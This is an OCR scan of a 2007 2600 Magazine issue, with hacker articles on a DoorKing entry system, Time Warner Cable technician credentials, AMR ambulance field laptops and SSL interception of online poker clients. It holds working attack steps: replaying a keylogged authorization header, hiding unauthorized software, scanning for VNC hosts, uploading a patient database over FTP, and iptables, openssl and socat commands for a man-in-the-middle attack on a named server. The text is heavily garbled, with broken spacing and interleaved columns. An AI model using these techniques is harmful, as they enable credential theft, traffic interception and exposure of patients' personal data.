expl or i ng thi s system. Don ' t di sabl e any of
the l ocks or do anythi ng that wou l d compro
mi se the secur i ty of the bui l di ng. Remember
we' re here to l ear n.
Conclusion
Dorki ng a DoorKi ng entry system i s aston
i s hi ngl y s i mpl e. I was sur pr i sed t o fi nd t hat s o
much was programmabl e us i ng t he keypad
i nterface and a meas l y fou r di gi t master code.
The above exampl es are har ml ess pranks,
but the poss i bi l i ty for much more mal i ci ous
acti ons does exi st . I t does have an RS-32 port
tucked away behi nd its l ocked face pl ate
and most model s have a 56k modem bui l t
i n for programmi ng vi a t he Remote Account
Management software, so I assume the abi l i ty
to program it vi a the keypad is a fai l safe i n
case n o other programmi ng methods are
avai l abl e. Oh wel l , at l east you can reset the
system' s wel come message to l et everyone i n
you r bui l di ng know that you " pwnd th i s pl ace
dODd" .
by Xyzzy
But j ust for ki cks l et ' s pretend I di dn' t
L i ke most peopl e I don ' t go l ooki ng for
have a key l ogger runni ng. The techni ci an
troubl e. I ' ve never made a hobby of tryi ng to
di l i gent l y cl osed the browser wi ndow when
steal passwords or vi ol ate peopl e' s pr i vacy.
he fi ni s hed, but he negl ected to qui t the
But when an opportun i ty s l aps you ri ght i n
browser ent i r el y. Th i s means that hi s authori
the face, I ' m as cur i ous as the next person.
zation sessi on was sti l l cached. Launch you r
Thi s is the story of one of those opportun i t i es.
favor i te packet s ni ffer, r el oad tech. nyc. rr. com
I ' m not here to demonstrate any el i te hack,
i n the browser, and voi l a! You have captured
just to share i nformati on wi t h you about a
the HTTP header conta i n i ng the tech ni ci an' s
vul nerabi l i ty at Ti me Warner Cabl e i n the
authori zati on l ogi n . I t' s hashed of cou rse, but
hopes t hat t hi s l arge company wi l l do some-
we don't care. Now swi tch over to tel net and
th i ng to fix thei r l ax secur i ty.
connect to tech. nyc. rr. com on port 80. Si mu-
I t al l started when a Ti me War ner Cabl e l ate a web request wi th the fol l owi ng HTTP
techni ci an arr i ved at my house to fi x i nter mi t-
commands, fol l owed by two new l i nes:
tent downt i me on my cabl e I nternet connec-
GET / HTTP/ ! . !
f k d d
Authorization: Basic <technician' s
t i on . A er po i ng aroun an di agnos i ng
login hash goes here>
very l i tt l e (my connect i on happened to be up
Host : tech . nyc . rr . com
at the t i me), the techni ci an sat down at my
Congratu l at i ons, you ' re a spoof. Now you
l aptop, opened a browser, and started typi ng.
may wonder what treasures awai t us on t hi s
Now I was i nterested. The techni ci an opened
myster i ous web page? Not much, but enough .
the URL tech. nyc. rr. com and l ogged i nto the
The "tech. nyc. r r. com" page i s di agnosti c
page us i ng an htaccess wi ndow. Now i f you
page that shows basi c i nformati on about a
were me, woul dn' t you wi sh you had a key
Ti me War ner customer ' s account and cabl e
l ogger runni ng r i ght about now? Wel l , I keep
modem. The page i s t i t l ed "Servi ceCerti fi cate
a key l ogger run n i ng 24/7 on my l aptop, so
versi on 4. 0. 0" whi ch i s not a commerci al
good th i ng you ' re not me. Hel l o user name
product as far as | can tel l ( someone pl ease
and password, ni ce to meet you .
correct me i f you know more) . The page
Spring 2007Page 1 9
di s pl ays the customer ' s account number,
name, address, and phone number. Th i s
i s i nterest i ng, because onl y the customer
name, address, and phone n umber are used
to authenti cate i ncomi ng cal l ers on Ti me
Warner tel ephone support. Let the soci al
engi neer i ng begi n.
The page al so i ncl udes t he I P and Mac
addresses of the two network i nterfaces on
the modem: the downstream Ethernet l i n k
a n d t he upstream DocSi s l i nk. I t al so l i sts the
UB R host name that the modem connects to,
pl us stats on upl oad and downl oad band
wi dth, the modem upt i me, and the modem
fi rmware vers i on and fi rmware fi l ename.
At the bottom i s an HTML text box l abel ed
" Comments . " I di dn' t pl ay wi t h t hi s, but I ' m
s ure you can thi n k of somethi ng fun . The
web server i s r un n i ng Apache versi on 1 . 3 . 2 9
a n d PHP versi on 5 . 0. 2 . Di rectory i ndex i ng i s
t urned on.
I al so noted that t he techni ci an hadn' t
entered any i nformat i on about my account
before l oadi ng thi s page, mea n i ng that the
server must use a referrer address l ocal to my
l ocat i on as the var i abl e used to determi ne
what customer account to di s pl ay. Hmmm,
t hi s coul d be fun . Anyone i nterested i n a
l i ttl e war wal k i ng? What ' s to stop me from
grabbi ng my l aptop, wal k i ng down the street
and tryi ng t hi s techn i que on any open wi fi
Hac
My
by anonymous
For the l ast three pl us years I have worked
for a competi tor to the nat i on ' s l argest pri vate
ambul ance provi der, Amer i can Medi cal
Response. I . i ke most peopl e i n the i ndustry I
have l earned to l oathe thi s monster for i ts a l l
t oo-corporate busi ness strategi es and its over
whel mi ng quest for hi gher profi ts - often at
the expense of rel i abl e qual i ty personnel and
equ i pment. Recent l y I compl eted my para
medi c i nternsh i p wi th a paramedi c preceptor
who works for AMR and I was treated to some
i nsi de i nformati on whi l e i nter ni ng. Havi ng a
node, thereby gl ean i ng the account number,
customer name, address, and phone number
for that connect i on? My i ndefati gabl e moral
compass? ah yes, I forgot about that.
Now comes the open l etter to Ti me Warner
Cabl e:
Dear Newbs,
Here are some tips on how to improve
your securi ty.
First, don ' t send passwords to servers as
clear text even if i t 's hashed. That's what SSL
is for.
Second, does the expression "honey pot "
mean anything to you? Prohibit your techni
cians from using customer computers to log
i nto anything. Physical access is inherently
insecure. Write that on the board a hundred
times until you memorize it.
Next, don ' t include an entire customer
account dossier on any web page, password
protected or not. If you don ' t understand why
this is bad practice, well then I can ' t explain
it to you.
Finally, don ' t use network addresses as
authentication variables of any kind. This is
trivial to spoof and exploit, particularly in the
age of open wifi nodes.
Oh, and please fix the intermittent down
time on my cable connection because i t's still
busted.
M'kay thanks.
techni cal background, my ears perked up
when t hi ngs were bei ng di scussed and my
preceptor had no qual ms about l ett i ng me
poke a round here and there. I n thi s arti cl e I
wi l l share what I l earned about AMR' s fi el d
computers dur i ng my i nternshi p.
I n some regi ons AMR i s now uti l i zi ng
notebook computers for chart i ng purposes.
A fi el d chart is di fferent from an i n-hospi tal
chart i n that i t contai ns a l l of the pat i ent ' s
b i l l i ng i nformat i on a s part of the medi cal
record recorded by medi cal personnel . I n
other words, protected personal i nformat i on
Page 20 2600 Magazine
is gathered and recorded by the EMTs and bei ng depl oyed i n the fi el d constant l y t hey
paramedi cs that operate on the ambul ance. coul d not be part of a domai n-based network.
Thi s i nformati on i s then transmi ted el ectroni - Thi s posed a real probl em i n t hat Supervi sors
cal l y to an ODBC database that the compa- and I T staff needed much more access to
ny' s b i l l i ng department accesses vi a dai l y the machi ne t han AMR was wi l l i ng to a l l ow
quer i es and assembl es i nvoi ces from the data thei r fi el d empl oyees to have. So someone
gathered. Because acceptabl e l evel s of secu- poked around on the I nternet and found t hat
ri ty are typi cal l y more expensi ve t han l ower by repl aci ng the actual user GPO fi l e you
l evel s, AMR has, i n i ts corporate wi sdom, can i mpl ement di fferent secur i ty measures
chosen the l atter of the two. Let ' s expl ore. for di ferent users. Basi cal l y, you create two
The computers used i n the fi el d as of the di fferent GPO fi l es, one ol der t han t he other
t i meof my i nternsh i p were a l l ltroni xGoBooks. and havi ng t i ghter secur i ty, and swap them
The company i ni ti al l y purchased GoBook around l i ke th i s: Log on as an admi ni strator
I 's ( the fi rst generat i on) , and has purchased and pl ace the newer and l ess secured GPO
whi chever model was most current ever s i nce named regi stry. pol i n the c: \wi ndows\
then. The l atest model i s the GoBook I I I , but ..system32\GroupPol i cy\ User \ di rectory.
there are pl enty of Go Book li s sti l l around. Next, l ogon u nder each of t he users you want
Hardware specs are avai l abl e at http://www. to gi ve more access to ( i . e. , s upervi sors and
.i troni x. com and http://www. gobook i i i . com/ I T personnel ) . Then, l ogon as the admi n agai n
. gb3/features . ht m. The i nterest i ng hardware and move the GPO to a di fferent fol der and
components i ncl ude B l uetooth capabi l i ty repl ace i t wi th the ol der regi stry. pol fi l e wi th
( l eft acti ve and u nsecured), 802. 1 1 big ( AMR more securi ty. When the Supervi sor and I T
typi cal l y orders onl y 802. 1 1 b chi psets) , and users are l ogged on wi th the ol der GPO i n
CRMA cel l u l ar frequency cards. The CRMA pl ace i t i s i gnored because the pol i ci es that
cards are the PC cards avai l abl e from wi re- are current l y appl i ed are newer t han the
l ess provi ders such as Ci ngu l ar and Ver i zon. ones i n the current GPo. The standard users
AMR uses both compani es for mobi l e I nternet however are never l ogged on wi t h the newer
access i n di fferent regi ons dependi ng on pol i cy i n pl ace so they i mpl ement the ol der,
whi ch provi der has the best coverage for a more secure pol i cy. Of course, these pol i
gi ven area. The cards are housed i nternal l y ci es are typi ca l l y very poor l y managed and
and connect t o an exter nal antenna mounted there i s n' t a whol e l ot you ' d real l y care to
on the screen port i on of the case. We' l l come do that a creati ve mi nd won ' t fi gure out how
back to thi s devi ce l ater for a di scussi on of to accompl i s h. I nstead of browsi ng di rec
the secur i ty hol es i t presents. tori es to l aunch programs create shortcuts
AMR upgraded these un i ts to Wi ndows on the desktop. And s i nce you can al ways
XP onl y over the l ast year or so. The offi ci al create a new text fi l e on t he desktop you
expl anat i on was that they feared Wi ndows have compl ete freedom i n wri t i ng batch and
XP woul d somehow not support the Access Wi ndows Scri pt fi l es to do you r bi ddi ng.
Database front-end they use for chart i ng. Because AMR does n' t l i ke thei r empl oyees
What I fi nd so amus i ng about t hi s is that they goofi ng off on t he cl ock they al so i nsta l l
purchased a Wi ndows XP Professi onal l i cense ContentWatch to restri ct I nternet use. Thi s
wi t h every GoBook I I I and t hen rel i ed on servi ce works by restri ct i ng websi tes based
thei r Wi n2K corporate l i cense for the act ual on t hei r categor i zati on i n a database obtai ned
|5 l i cens ure. However, when they swi tched from an I nternet server. A user l ogs on wi th a
to Wi nXP they actual l y purchased a corpo- username and password and t hei r restri cti on
rate l i cense to cover a l l of the computers that l i st i s downl oaded. Each si te vi si ted by I nternet
they al ready had l i censes for ! Thi s, of course, Expl orer is compared agai nst a database that
means you stand a good chance of bei ng categori zes si tes based upon content (e. g. ,
abl e to use the Wi nXP Pro l i cense stuck to shoppi ng, news, personal , adu l t, etc. ) and
the bottom of the GoBooks wi t hout gett i ng users are onl y a l l owed to vi ew si tes wi th i n
caught. approved categori es. Si tes that have not
Now, Wi ndows XP Pro i mpl ements Active been categor i zed can be bl ocked or vi ewed
Di rectory ( Duh) , and AD has several secu ri ty based upon the i ndi vi dual user ' s setti ngs that
pol i ci es that can be i mpl emented to l i mi t the are appl i ed by thei r admi ni strator. Si nce the
access users have, but you need a Domai n restri cti on l i sts are downl oaded each ti me a
Control l er s uppl yi ng the Group Pol i cy user l ogs on I have not found a way to get
Object in order to have di ferent pol i ci es around thi s part i cul ar hurdl e. I t' s not that I
appl y to di fferent users. Wi th the computers wanted to downl oad porn . I j ust wanted to
Sprng 2007Pg
e 21
use MySpace and "personal s" are restri cted. MSACCESS. EXE. Thi s i s n i ce i n that i t stores
The best way to overcome thi s woul d be confi gurati on data, i ncl udi ng what ports the
to snag a supervi sor's password s i nce they program uses for sendi ng and recei vi ng i n
have free access or to fi nd a way to ki l l the these tabl es. Browse around and fi gure out
program. Thus far I have been uns uccessful what ports are current l y bei ng used and query
i n ki l l i ng i t, but I never tri ed too hard ei ther. the resu l ts of you r port scan for addresses wi t h
Of course, i f you ' re brave and don ' t mi nd a both the MEDS port and port 5900 open. Any
traceabl e approach you cou l d al ways down- computers you fi nd wi l l l i kel y be AMRs.
l oad Fi reFox vi a a tel net' d FTP connecti on. Expl or i ng MEDS even more t ur ns up a few
If you i ntend to do thi s I suggest buryi ng the other i nteresti ng l i ttl e qu i ps. The data entered
program fi l es deep i n the di rectory structure i nto MEDS i s stored i n separate access tabl es
and l aunchi ng vi a an u nassumi ng scri pt i n wi t h a PCR 1 0 referenci ng the i ndi vi dual chart
the system32 or some other cl ogged di rec- each pi ece of i nfor mat i on is associ ated wi t h.
tory. You mi ght al so want t o di g t he u n i nsta l l For i nstance, there i s a tabl e t i t l ed MED_C that
data out of the regi stry so i t does n' t s how contai ns the l i st of pati ent medi cati ons typed
up on the "Add/Remove Programs" control i n by a user ( medi cat i ons sel ected from a
panel . See, they ' l l trace the t i me stamp of drop down l i st are stored i n a separate tabl e) .
the program di rectory back to who was us i ng Each row has three col umns . The fi rst col u mn
t he computer on that date at that t i me, and i s the defaul t Pr i mary Key and i ncreases by a
unfort unatel y the system c l ock is fai r l y wel l val ue of one i n each row, the second col u mn
protected. i s t he i ndi vi dual PCR 1 0 ( un i que onl y on
Movi ng on t o t he ever more i nteresti ng t hat computer), and t he thi rd i s t he actual
sect i on where we di scuss t he CRMA PC cards text entered by a user. So to fi nd a pati ent ' s
and how they access the I nternet. The regi on personal i nformat i on you need onl y r un a
I am most fami l i ar wi th used Ci ngul ar as a query of the appropri ate tabl es and match the
wi rel ess provi der and Sony GC83 EDGE PC pati ent ' s name, date of bi rth, address, phone
cards. I ' m not s ure why, but t hey refuse t o use nu mber, and Soci al Secu ri ty Number based
the most recent fi rmware versi ons. Rumor on the PCR 1 0. I t shoul d be noted t hat fai l u re
has it someone somewhere had a probl em t o protect t hi s i nformati on from unauthori zed
wi th a fi rmware versi on and had to down- users (whi ch i ncl udes an EMT or paramedi c
grade t o f i x t he probl em. Of course, two or authori zed to use the system but not autho
three new vers i ons have come out si nce then ri zed to vi ew data entered by another user) i s
and AMR has yet to upgrade to t he newer a vi ol at i on of federal l aw - reference HI PAA
vers i ons. What I fi nd parti cu l ar l y i nteresti ng 1 64. 308 (a)(4), whi ch states that users must
is that the Ci ngul ar networ k i ssues Cl ass C be prevented from accessi ng sensi ti ve el ec
addresses. Coupl e th i s wi th the use of Real troni c data they do not need to access i n
VNC on every AMR computer a n d you have a order to perform thei r dut i es. Basi cal l y, you
gapi ng secur i ty hol e. I f someone were to snag shoul d not be abl e to vi ew pati ent data you
the company password ( I bel i eve they have di d not personal l y enter, but you can. But to
onl y two passwords - one for workstati ons real l y get at the dat a i t's best to j ust steal the
and one for servers) they coul d s ni f around whol e database, someth i ng el se you shou l d
t he Ci ngul ar network, ass umi ng they have defi ni tel y not be abl e to do. A standard user
a Ci ngu l ar card and are i n the same regi on, can r un tel net, open a connect i on to an
and fi nd a computer wi t h port 5900 open. FTP server, and upl oad " C: \ Program Fi l es\
The advantage to the I P addressi ng scheme MEDS\ MEDS. mdb" ( somet i mes the fi l e name
bei ng Cl ass C, for those who haven ' t fi gured i ncl udes a vers i on number) . Ol der versi ons of
it out, is that you si gni fi cant l y di mi ni s h the MEDS created a fi l e i n the root di rectory t i t l e
number of I P addresses you have to scan to " PCRDATA" wi t h no fi l e extensi on. Th i s fi l e
fi nd an AMR computer. But there i s another had a l l of the PCR data on the system i n pl ai n
way you can i sol ate an AMR computer on text, another gri evous HI PPA vi ol at i on. Today
th i s network. the fi l e i s encrypted, a step that took onl y fou r
As previ ousl y menti oned, AMR uses an or fi ve years t o i mpl ement.
Access Database front-end devel oped i n- As you can see by doi ng t hi ngs i n-house
house to chart pati ent data. They have dubbed and under budgeti ng thei r proj ects AMR has
the program MEDS. I t stands for Mul ti - EMS l eft themsel ves open to some pretty cost l y
Data System. The database i s u nencrypted so l awsu i ts. Wi t h the pri vate ambul ance i ndustry
any user can poke around i n a l l of the tabl es, becomi ng more and more competi ti ve, they
provi ded they can fi gure out how to l aunch have rea l l y t aken some bi g chances wi th t hi s
Page 22 2600 Ma
gazine
program. Consi der the fact that some states
have mandated publ i c report i ng of securi ty
breaches i n publ i cl y traded compani es, mi x
i t wi t h the general l y very competi ti ve publ i c
bi ddi ng process that EMS agenci es are typi
cal l y requ i red t o go t hrough every few years
for thei r ambul ance provi der contracts, and
throw i n a l i ttl e i ndustri al espi onage . . . see
where I ' m goi ng? AMR has opened i tsel f to
s i mpl e espi onage tact i cs by maki ng i t i ncred
i bl y easy for a corporate spy to get h i red on
as a fi el d empl oyee, steal protected personal
data stored on a f i el d system, and l et i t be
known that the data was stol en. AMR woul d
then be requ i red t o contact every person
whose personal i nformat i on was compro
mi sed and i nform them of such and make a
publ i c announcement reporti ng the breach.
Someth i ng of t hat nat ure happeni ng dur i ng
a contract bi d wou l d be devastati ng t o t he
company, whi ch i s al ready l osi ng bi ds across
the nati on.
That ' s pretty much al l of t he goodi es I
pi cked up regardi ng the computers, but here
are some fun vehi cl e facts for those of you
u nfort unate enough to be worki ng for the
gi ant:
1 . I f you ' re t i red of heari ng the seat bel t
remi nder di ng at you a l l the ti me you can
di sabl e the Ford " Bel tMi nder" feature qui te
eas i l y. Si mpl y turn the ambul ance off, keep
a l l of the doors cl osed, set the parki ng brake,
t ur n off the headl i ghts and do the fol l owi ng:
I nsert the key and t ur n it forward to the fi rst
posi ti on, but do not start the car. After about
a mi nute the l i ttl e guy wear i ng hi s seat bel t
l i ght wi l l appear on the cl uster panel ( dash
board) . You now have 30 seconds to buckl e
and t hen u nbuckl e you r seat bel t t en t i mes.
After the tenth ti me the l i ght wi l l fl ash fou r
ti mes i ndi cati ng the functi on has been
di sabl ed. Now buckl e and unbuckl e one
more t i me. Congrats, i t wi l l now l eave you
al one. Each year i s di fferent so pl ay around
wi th i t. I fou nd th i s i nformat i on on Googl e,
so you shou l d be abl e to as wel l . Sorry for
those who have RoadSafety. Thi s won ' t work
for you.
2 . If you don ' t l i ke bei ng di nged at for
havi ng the door open, or havi ng the l i ght
on, i t' s pretty easy to di sabl e thi s featu re too.
Fi rst, you shou l d know that when the door
i s open the ci rcui t i s closed by the door pi n.
So di sconnecti ng t he door pi n wi l l make the
vehi cl e computer thi n k the door i s al ways
cl osed. To do th i s, j ust pu l l real l y hard (I was
abl e to do i t wi th bare fi ngers) on the door pi n
i tsel f. When i t comes out s i mpl y di sconnect
the wi res and then rei nsert the pi n i nto the
door j am. Done.
3. Fi nal l y, to shut up that l ady who bl abs at
you whi l e you ' re backi ng up j ust take a l ook
at the l i ttl e speaker beh i nd the dri ver ' s head.
On one si de i s a t i ny l i ttl e swi tch. F l i p i t and
she' l l be no more.
None of these l i ttl e workarounds damages
or vanda l i zes the vehi cl e in anyway, so have
at it. And for God's sake, fi nd a company wi th
a sou l to work for. Peace!
HOPE NUMBER SIX
I f you mi ssed out on our l atest conference (or if you
were there a nd somehow managed to mi ss one of the
more tha n 70 ta l ks g i ven), may we s uggest gett i ng
ahol d of our HOPE Nu mber Si x DVDs ?
There's no way we ca n l i st them a l l here but if you go to
http://store. 2600. com/hopen u mbers i x. html you' l i get a
sense of what we' re ta l ki ng a bout.
We sti l l have l eftover s h i rts too. For ?20 you get a
HOP E s hi rt, a conference badge, a conference prog ra m,
and a HOPE sti cker. Overseas add ?5 for s hi ppi ng.
2600
PO Box 752
Mi ddl e I s l and, NY 1 1 953 USA
Spring 2007

O ' | a Poka| 5o
by John Smith Root ki ts are
Al though we most often associ ate SSL based rootki ts for UNI X and Wi ndows whi ch
( Secure Sockets Layer) or TLS (Transport can be made to redi rect network traffi c to an
Layer Secur i ty) wi t h " secure" versi ons of our attacker. I nsecu re routers ar e another opt i on;
favor i te I nternet servi ces ( HTTPS, I MAPS, t hat L i nux router the nei ghborhood geek
SMTPS) , i t can be used to secure arbi trary set up for pizza and coke l ooks l i ke j u i cy
appl i cat i ons. I n fact, it is used qui te ofen target. . . .
i n t h e onl i ne gambl i ng worl d t o secu re the My traffic redi rect i on sol ut i on i nvol ved a
connect i on from the game cl i ent to the game Perl scr i pt tor Nemesi s, whi ch i nj ects unso
server. Unfort unatel y i t i s often used i n an l i ci ted ARP requests, and i ptabl es packet
i ncorrect manner, whi ch l eaves i t open to mangl i ng to rewri te the desti nat i on server I P
man- i n-t he- mi ddl e attacks, where an attacker address/port wi t h a l ocal one. Al l you need
can read/modi fy/i nsert thei r own data i nto the to do i s fi gure out whi ch I P the poker cl i ent
connect i on. tal ks t o and rewri te i t t o you r wai t i ng MI TM
SSL provi des methods for endpoi nt veri fi - process. For exampl e, Ci ty Poker uses I P
cat i on and traffi c pri vacy for network commu- 2 00. 1 24. 1 3 7. 1 09 port 443. I f I ' m run n i ng my
n i cat i ons. Endpoi nt veri fi cat i on i s done by socat process on port 1 0007, the fi rewal l r ul e
val i dati ng a "peer certi fi cate" from t he remote becomes:
host by checki ng the s i gnature wi t h a trusted
echo 1 > /proc/sys / net/ ipv4 / ip_forward
thi rd-party ( such as Ver i si gn) . Traffi c I)ri vacy
I sbin/ iptables --policy FORWARD ACCEPT
,
iptables -t nat -A PREROUTING -p tcp
uses symmetr i c ci phers to encrypt/decrypt
--d 2 0 0 . 1 2 4 . 1 3 7 . 1 0 9 --dport 4 4 3 "
data between the two hosts. -j \ REDIRECT --to-ports 1 0 0 0 7
Traffi c pr i vacy i s obvi ous - you don ' t want The fi rst two l i nes al l ow us t o forward
someone wi t h a s ni ffer to see you r passwords traffi c and the th i rd l i ne i s our fi rewal l r ul e.
or credi t card number when you ' re orderi ng Man-i n-the-Middle Process
you r 2600 subscr i pt i on. E ndpoi nt veri fi ca- Al though we can rol l our own man- i n-
t i on i s extremel y i mportant al so, but many the- mi ddl e process, I chose t o use socat
devel opers ( obvi ousl y) don ' t th i n k of i t. I n for s i mpl i ci ty. I f you ' re goi ng to wri te you r
fact, t he endpoi nt veri fi cat i on i s exact l y what own, you s i mpl y need to have i t l i sten for
prevents man- i n-the- mi ddl e attacks - if the SSL con nect i ons on one si de and establ i s h
peer ( remote server) that i s bei ng connected them on the other. You wi l l need to generate
to can ' t be veri fi ed, then the cl i ent shou l d a fake server cert i fi cate that wi l l be gi ven to
qui t. Unfort unatel y, thi s opti on i s turned Ou the cl i ent - sel f-si gned/expi red does n' t mJIIC
oy defaul t ! Any cl i ent sofware t hat has th i s si nce the cl i ent i sn' t checki ng! Here ar e t he
f l aw can t hen be attacked. commands to generate a sel f-s i gned cert i fi -
The man- i n-the- mi ddl e attack consi sts cate, and to set up socat to perform the MI TM
of three steps: redi rect i ng network traffi c, l oggi ng data i n cl eartext to stdout:
answer i ng requests from the cl i ent on behal f
openssl reg -x5 0 9 -nodes -newkey
of the server, and answeri ng requests from the
-rs a : 1 0 2 4 -days 365 -keyout
-fakecert . pem \ -out fakecert . pem
server on behal f of the cl i ent . I chose to use
socat -v -x openssl-l isten : 1 0 0 0 7 , cert
ARP-cache poi soni ng and i ptabl es mangl i ng -ificate= . I fakecert . per, verify=O, fork
for the redi rect i on, and socat to act
u
al l v "`
opens s l :
2 0 0 . 1 2 4 . 1 3 7 . 1 0 9 : 4 4 3 , verify=O
execute t he man- i n-the- mi ddl e attack.
'
I
-2>& 1 tee . I ci tyPokerCapture . txt
managed to break Vi rgi n Poker, and Ci ty
When generat i ng the cert i fi cate, I just
Poker ' s cl i ent, vi ewi ng a l l c l i ent-server traffi c
chose al l the defa ul t s. The " -nodes" argument
i n cl ear text.
means you don ' t want to enter a passphrase
Trafic Redi rection
(password) for the key. The soeat l i ne sets u p
Gett i ng network traffic from the vi ct i m i s n' t
an openss l - l i sten socket on port 1 0007 wi t h
t oo hard. I f you ' re on the same LAN you can
the fake cert i fi cate we generated above. 1 1
use ARP cache poi soni ng or DNS hi jacki ng.
wi l l l og packets to stdout ( " -v -x" arguments)
Page 24 2600 Magazine
and establ i sh an openssl connect i on to t he
real game server wi t hout veri fyi ng t he peer
cert i fi cate (veri fy=O) .
You shou l d now be abl e to fi re up the
poker cl i ent and see a n i ce c1 eartext versi on
of everyt hi ng run n i ng between t he cl i ent and
server.
Conclusions
wrote a tool to check for expi red/sel f
si gned cert i fi cates and scanned 645 SSL ports
on a /1 9 network wel l known for host i ng
gambl i ng-rel ated s i tes. I t found 3 04 ports that
were mi sconfi gured and are therefore open
to thi s type of attack. Some compani es do thi s
I mpl i cations the ri ght way - Prty Poker, for exampl e, ver i -
My ori gi nal moti vat i on was to t ake a fi es the peer cert i fi cate and checks the s ubj ect
l ook at poker protocol s, to see how " chatty" name i n the cl i ent .
they are and what i nformati on i s transferred. Thi s fl aw i s actual l y qui te easy to fi x. On
For exampl e, what i f the protocol desi gner the cl i ent s i de, devel opers shoul d al ways val i
thought i t wou l d be OK i f al l of a pl ayer's date the peer certi fi cate (at l east in produc
" hol e cards" (two cards deal t before t he fi rst t i on ! ) and servers shoul d have SSL cert i fi cates
round of bett i ng) were sent to each cl i ent s i gned by real CAs. Protocol devel opers
before the hand began. We can reverse engi - shou l d always ass ume that the protocol can
neer the protocol and see what t he command be vi ewed and treat i nput from the c l i ent
structure i s l i ke. I s there a debug mode or as tai nted. Data shoul d be checked wi t h a
speci al admi n commands that we can send? defaul t reject pol i cy - even though t he cl i ent
The server process now l oses any cl i ent-si de and server were wr i tten by t he same team,
fi l ters for t hi ngs l i ke data l engths and types. that doesn't mean you shoul dn't sani t i ze data
Can you say "fuzzer?" before us i ng i t.
nQQClOldala lrOm Lly lkCr dCaln_ lhC luN Card.
" 2 0 0 6 / 0 9 / 0 7 1 3 : 5 1 : 2 1 . 1 6 2 3 3 1 1ength=1 1 4 from=1 8 9 6 4 to=1 8 9 6 3
0 0 00 0 0 2 2 0 0 0 1 3 3 08 3 2 3 5 36 35 3 2 3 1 3 4 3 0 3 . 2 5 6 5 2 1 4 0
0 0 00 4d 0 0 4 4 6 5 6 1 6c 69 6e 6 7 2 0 7 4 7 5 7 2 6e M. Dealing turn
2e 00 4c 00 39 00 00 00 00 48 00 02 31 37 08 32 L . 9 B 1 7 . 2
3 5 3 6 3 5 3 2 3 1 3 4 3 0 0 0 0 0 S f 4 4 0 0 4 2 6 f 6 1 7 2 5 6 5 2 1 4 0 _D . Boar
64 20 63 61 72 64 73 20 5b 51 68 20 54 63 20 35 d cards I Oh Tc 5
64 2 0 4b 63 5d 00 43 32 00 3 1 36 00 43 30 00 33 d KC j . C2 . 1 6 . CO . 3
3 6 0 0 4 3 3 3 0 0 3 1 3 1 0 0 4 3 3 1 0 0 3 8 0 0 S f 4 c 0 0 6 . C3 . 1 1 . C1 . 8 . _L.
3 0 0 9 .
nQQClOldala lrOm vr_n lOkCr CCnldOn_ aQn_ andrCQly.
" 2 0 0 6 / 0 8 / 0 9 0 8 : 3 6 : 3 2 . 4 1 4 7 2 3 length=1 7 from=492 to=4 9 1
5 0 4 3 4b 54 0 1 0 0 0 0 0 0 0 0 0 0 0 0 1 1 50 69 6e 6 7 PCKT o Ping
0 0
- 2 0 0 6 / 0 8 / 0 9 08 : 3 6 : 3 2 . 4 3 9 2 8 7 length=1 7 from=864 to=863
50 4 3 4b 54 0 1 0 0 00 0 0 0 0 0 0 0 0 1 1 5 0 69 6e 6 7 PCKT Ping
00
Oorlof mijn arme schapen
Die zijt in groten nood
Uw herder zal niet slapen
AI zijt gij nu verstrooid!
The above is from " Het Wi l hel mus"
( the Dutch nati onal anthem) , verse 1 4.
I t's a concept and it does n' t transl ate wel l
to Engl i s h. "Hacker" i s a concept about
concepts. Unfortunatel y i t does n' t transl ate
wel l to any l anguage. My l i fe is about t ur n i ng
concepts i nto usefu l products. A hacker does
that and much more. Let ' s get to i t .
I n the 60s, AT&T ran an ad campai gn:
"The tel ephone i s not a toy. " Thank you AT&T!
Vi etnam, L BJ, the Col d War, and so on . . .
everythi ng was a l i e. S o the tel ephone must
be the best toy ever i nvented! I s a greater
u nderstatement poss i bl e?
I al ways wanted the other end to hang up
fi rst s o I cou l d hear what i t sounded l i ke. That
l i tt l e " pl i ek" tra i l i ng off i n the background
was fasci nat i ng. I real i zed i t must pl ay the
major rol e i n maki ng and mai ntai n i ng the
" l ong di stance" cal l . Soon I cou l d whi st l e i t
and see what i t cou l d do - before the Quaker
Oats wh i st l e and 800 numbers.
My ear l y experi mentat i on was onl y to
pl aces my parents cal l ed. They onl y l ooked at
the "pl ace" on the bi l l Jnd i f I had an "acci
dent," t hat was si mpl y i t for the day.
There was more, so much more. Some
t i mes after pl aci ng a "tol l cal l " (a type of
l ocal cal l ) I ' d hear the number I pul se-di al ed
pul se-di al ed a second t i me. There were beeps
associ ated wi t h t hi s. Other ti mes I wou l d
hear beeps that sounded l i ke steel dr ums . |
l oved the " dr ums" and qu i ckl y real i zed t hi s
was n' t mus i c but communi cati ons! (They
were MF tones, to be preci se. ) I was on to
somethi ng. The " ul tra-modern" phone system
was us i ng the same techn i que the pr i mi ti ve
" Bush peopl e" had used for generat i ons. I t
was obvi ous tones were tel l i ng the other end
what t o do whether I heard i t or not. How di d
t hey do i t? " Ask and you sha l l recei ve. " When
everyth i ng seemed to be a l i e, that bi bl i cal
verse was t o be the truth. The l i tt l e brat was
becomi ng an operator and l ear n i ng how to
soci al engi neer. Soon, the secret was mi ne.
Best of al l , I was to di scover I was n' t al one.
There was th i s ki d i n s i xth grade named Dan
N. He was the shortest ki d i n the cl ass but
very strong and nobody messed wi t h h i m.
Da n was l ater to tel l me of someone who
cou l d make "free cal l s" wi th sound l i ke I
coul d. That man was Cap' n Crunch .
It was 7 969. We were a few 1 2 -year-ol d
boys and there were a few twi ce our age. We
knew we had somethi ng goi ng i nto jun i or
hi gh, but we had no idea what our i mpact on
soci ety was to be.
Wi th an age range between 1 1 and 1 4
years, jun i or h i gh was the u l t i mate freak
show. For some of us it was a "phreak" show
and we di dn' t show a thi ng outs i de our ti ght
group. Th i s was very uneventfu l ti me i n my
l i fe.
I n 1 970 a very sma l l pi ece i n Popular
Science reported on a new payphone wi th
a pi ct ure of th i s most ugl y beast. The most
i mportant features were a s i ngl e coi n sl ot and
" si l ent el ectroni c si gnal s to repl ace the fami l i ar
sounds that current l y si gnal the operator of
depos i ted coi ns. " I nterest i ngl y, t hese horrors
were to show up fi rst where I l i ved. I was
goi ng to fi nd out what those "s i l ent si gnal s"
were. Fi rst, I had a fr i end cal l me at one of
these "fortress phones" whi l e he recorded the
cal l . I " sacri fi ced" 40 cents ( my l u nch money)
to do th i s. I i nstructed my fr i end to cal l back
on the off chance I got the money back
and we coul d record the tones agai n. Sure
enough it ret urned! We were abl e to repeat
th i s several t i mes. Don ' t forget: Hack i ng i s
sci ent i fi c. I t was a s i mpl e matter t o whi p up
